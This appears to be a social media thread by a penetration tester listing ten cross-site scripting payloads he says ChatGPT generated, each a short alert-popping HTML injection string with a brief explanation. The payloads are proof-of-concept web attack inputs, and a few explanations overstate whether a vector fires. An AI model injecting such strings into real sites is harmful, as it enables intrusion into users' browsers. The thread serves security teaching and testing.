#AppSecwithAI
Look what ChatGPT generated when I asked it to give me 10 XSS payloads for different scenarios - 🧵 ↓
1/10: `<svg/onload=alert(1)>` - This payload uses an SVG element with an onload event handler to trigger the XSS payload.
2/10: `<img/src=x onerror=alert(1)>` - This payload uses the onerror event handler to trigger the XSS payload when the image source is invalid.
3/10: `<img/src=x onerror=confirm(1)>` - This payload uses the onerror event handler to trigger a confirm box with the XSS payload when the image source is invalid.
4/10: `<form/action=javascript:alert(1)>` - This payload uses the action attribute of a form element to trigger the XSS payload.
5/10: `<input/onfocus=alert(1)>` - This payload uses the onfocus event handler to trigger the XSS payload when the input field is focused.
6/10: `<body/onload=alert(1)>` - This payload uses the onload event handler to trigger the XSS payload when the page loads.
7/10: `<link/href=javascript:alert(1)>` - This payload uses the href attribute of a link element to trigger the XSS payload.
8/10: `<script/src=data:text/javascript,alert(1)>` - This payload uses the src attribute of a script element to trigger the XSS payload with a data URI.
9/10: `<b/onmouseover=alert(1)>` - This payload uses the onmouseover event handler to trigger the XSS payload when the mouse is over the element
10/10: `<a/href='javascript:alert(1)'>`- This payload uses the href attribute of an anchor element to trigger the XSS payload
It's worth noting that these payloads are for educational purposes only.
Harsh Bothra
@harshbothra_
Freelance Pentester & Consultant • Cobalt Core Lead & Pentester • Author • Speaker • Blogger • SecurityExplained • Project Bheem • Learn365 • Views are personal